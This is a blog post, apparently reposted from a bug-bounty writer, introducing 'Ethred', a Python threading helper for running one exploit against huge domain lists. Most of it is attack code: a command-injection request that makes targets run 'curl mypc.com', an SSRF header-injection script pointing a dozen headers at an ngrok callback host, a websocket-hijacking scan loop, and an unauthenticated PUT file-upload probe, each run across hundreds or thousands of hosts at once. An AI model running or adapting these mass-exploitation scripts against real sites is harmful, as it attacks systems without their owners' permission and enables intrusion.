automate bug bounty using Ethred

9 months ago 65

BOOK THIS SPACE FOR AD

ARTICLE AD

Ethed is a python library that i create to make automation very easy, mostly used for bug bounty

Hi everyone.

did you ever had a million dollar vulnerability idea but in the specific website it didnt work and you said to yourself that it might work on other website.

Today i will show you how you can do 1 exploit, and test it on an insane amount on websites together. easily and fast!

below code is the magic code that i created to do so:

from threading import Thread
from time import sleep

import multiprocessing

class Ethred:
"""
# example code

def command(argv_1, number):
os.system(f"sleep 2")
print(argv_1, number)

Ethred(
5,
timeout=3
)(
open("e.txt").readlines(),
command
)
"""
def __init__(self, number_of_threads, timeout=None) -> None:
self.stop_at = number_of_threads
self.c = 0
self.e = 0
self.r = lambda *args: 0
self.timeout_sleep = timeout

def timeout(self, f, *args):
p = multiprocessing.Process(target=f, args=args)
p.start()
p.join(self.timeout_sleep)
if p.is_alive():
p.kill()
p.join()

def _do(self, a, b) -> None:
self.timeout(self.r, a, b)
self.c -= 1

def __call__(self, v: list, f) -> None:
self.r.__code__ = f.__code__
for i in v:
i = i.strip()
try:
while 1:
if self.c < self.stop_at:
Thread(target=self._do, args=[i, self.e]).start()
self.c += 1
self.e += 1
break
else:
sleep(0.1)
except KeyboardInterrupt:
exit("bye bye")

well while it may look very complex and hard at first. after i explain this, it will be very very easy. 😊

lets say you found a command injection vulnerability in a website, and you suspect that the vulnerability might be on other websites as well. below is a poc of the exploit:

import requests

requests.get("https://website.com/?command=curl%20mypc.com")

Lets say you have a txt file with all of the domains that you want to check if they are vulnerable to the same attack. what you need to do in that case is simply write the below script:

def dc(domain, number):
import requests

requests.get(f"https://{domain}/?command=curl%20mypc.com")

Ethred(
1000,
7
)(
open("all_the_domains.txt").readlines(),
dc
)

The above script will go to all the domains inside the “all_the_domains.txt” file, and one by one will execute the above script with a different domain everytime.

i will explain the code in parts now.

first part

def dc(domain, number):
import requests

requests.get(f"https://{domain}/?command=curl%20mypc.com")

what i did in the above code is simply create a function that contain the exploit.

The domain parameter is the parameter that you want to change, in that case it was the domain. in other cases it can be the path, the subdomain, or anything else that you want it to be.

The number parameter is a number for every time we start the script. first time the script run it will be 0, second time it will be 1, third time will be 2, and so on and on.

second part

now lets talk about calling Ethred

Ethred(
1000,
7
)(
open("all_the_domains.txt").readlines(),
dc
)

The __init__ parameters (first paramaters).

The 1000 is the amount of threds, that means that we execute the script 1000 time simultaneously, that means that we start 1000 times with 1000 domains from the list and everytime that a script finished a new script will be started until the list will over.

The 7 is the timeout parameter. every time that the function is executed it will be terminated automaticly after 7 seconds if it didnt finish already.

The __call__ parameters (last parameters).

The “open(“all_the_domains.txt”).readlines()” is the list of the parameters the the dc function will get. in that case is the list of the domains.

The dc parameters is the function that we want to execute. in that case is the exploit that we wrote.

What can i do using Ethed?

What i did is collect all the domains that pay money is bugcrowd and hackerone and started running script every time i have an idea for a vulnerability.

In the below image there is an example of a script that i created to check if there are website that vulnerable the ssrf using hist header injection:

def dc(domain, number):
import requests

ssrfed = "14a2-185-175-35-148.ngrok.io"

requests.get(
f"https://{domain}/",
headers={
"Referer": f"http://{ssrfed}/{domain}/ref",
"Contact": f"{domain}@{ssrfed}",
"X-Wap-Profile": f"http://{ssrfed}/{domain}wap.xml",
"Forwarded": f"for={ssrfed};by={ssrfed};host={ssrfed}",
"From": f"{domain}@{ssrfed}",
"X-Forwarded-For": f"{ssrfed}/{domain}",
"X-Real-IP": f"{ssrfed}/{domain}",
"X-Originating-IP": f"{ssrfed}/{domain}",
"X-Client-IP": f"{ssrfed}/{domain}",
"True-Client-IP": f"{ssrfed}/{domain}",
"Client-IP": f"{ssrfed}/{domain}",
"CF-Connecting_IP": f"{ssrfed}/{domain}"
}
)

Ethred(
500,
10
)(
open("all_the_subdomains.txt").readlines(),
dc
)

In the below example i create a script that check on all the web sockets that i have found, if they are vulnerable to cswsh.

def dc(url: str, number):
import os

os.system(f"echo '{url}'|/home/eyal/go/bin/cswsh-scanner > ws/r/{url.split('/')[-2]}.txt")
print(number)

Ethred(
250,
20
)(
open("ws/ws.txt").readlines(),
dc
)

Below image show another script to check if i can upload file using put request, which can lead to some critycal vulnerabilities:

def do(host, n):
import requests
try:
requests.put(
f"http://{host}/qwtmhewqtvyuewmtgyuewbte.html",
data="123eyal123e",
allow_redirects=False
)

r = requests.get(f"http://{host}/qwtmhewqtvyuewmtgyuewbte.html", allow_redirects=False)
if "123eyal123e" in r.text:
print(host, n)
except requests.exceptions.RequestException:
pass

Ethred(
300,
10
)(
open("all_the_subdomains.txt").readlines(),
do
)

This was just the begining of what i have done. you can be very very creative with this, and find custom vulnerabilities very easily. you can take it for using your own way with your hacking style.

Read Entire Article